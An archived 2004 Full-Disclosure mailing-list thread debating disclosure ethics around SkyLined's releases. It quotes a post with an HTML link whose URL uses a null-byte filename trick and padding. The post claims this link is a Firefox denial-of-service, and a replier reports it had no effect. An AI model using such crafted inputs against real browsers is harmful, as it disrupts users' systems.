lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: jprice at misterunix.com (Jeff Price)
Subject: [SPAM] Re: To anybody who's offended by my
 disclosure policy-GET THIS GUYS

Hmmm....

I tried it on a sandboxed system with Firefox and it made no difference 
on CPU usage. What is this exploit supposed to do?



Rafel Ivgi, The-Insider wrote:

>SkyLined is a great dude. Scerious guy!
>He is only worthy for RESPECT and no blame.
>There is no signed law against releasing such information and its funny
>someone is anyhow talking about this in
>FULL-DISCLOSURE list, which its entire concept is to disclose full details
>about vulnerabilities.
>
>By the way, for all of FireFox fans....FireFox has many open vulnerabilities
>which its vendor refuses to fix. Even after notifing
>and even after 4 month :-)...Moreover, they are just like MS claiming
>certain bugs are not bugs, talking "in the air" and without checking
>and under-blowing risk values. They even don't sign their exe's(which is a
>super minimal protection against man-in-the-middle replacing downloads) so
>microsoft windows can't say its a valid file from a valid vendor and not a
>virus.
>
>For Example:
><a
>href='http://theinsider.deep-ice.com/ctfmon.exe%00/hehe.exe.||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||
>'>test it</a>
>
>This has no effect on I.E......
>Will cause LooserFox, ahh sorry, FireFox to ***BURN ALL YOU CPU!!! 100%
>FOREVER...***
>What i am saying is, it is now who codes the software, it is how you do.
>(if i was not in a job working frame, i would publishing things that will
>cause you all to say its shit)
>FireFox team claimed its an old bug.bla bla bla.and has no problem and no
>security risk...bla bla bla... and didn't fix it after 4 month...
>Just like MS when they are not even commercial, than what they are? on the
>way to making money...to be the second size'd market share browser.
>
>GO SKYLINED!
>
>Rafel Ivgi, The-Insider
>Security Consultant
>Malicious Code Research Center (MCRC)
>Finjan Software LTD
>E-mail: rivgi@...jan.com
>---------------------------------
>Prevention is the best cure!
>----- Original Message ----- 
>From: "ph0enix" <ph0enix@...enix.org>
>To: "'Gadi Evron'" <ge@...uxbox.org>
>Cc: "'Berend-Jan Wever'" <skylined@...p.tudelft.nl>;
><full-disclosure@...ts.netsys.com>
>Sent: Saturday, November 27, 2004 5:56 PM
>Subject: Re: [Full-Disclosure] To anybody who's offended by my disclosure
>policy
>
>
>  
>
>>>Question is, do you want to be one of the kids playing and ruining
>>>lives, or do you want to be one of the people who report
>>>problems and do something about them - plus get attention, respect and
>>>      
>>>
>all
>  
>
>>the rest?
>>    
>>
>>>The guy has talent? Fine by me. I wish him all the luck.
>>>
>>>This is not about full disclosure. I can live with Full Disclosure. I
>>>can't like with kids who think they own the world and want to
>>>pwn the world.
>>>
>>>Gadi.
>>>      
>>>
>>Why do you think he's just a kid who's playing around and runining lives?
>>
>>_______________________________________________
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.netsys.com/full-disclosure-charter.html
>>    
>>
>
>
>-----------------------------------------------
>This message was scanned for malicious content and viruses by Finjan Internet Vital Security 1Box(tm)
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>  
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ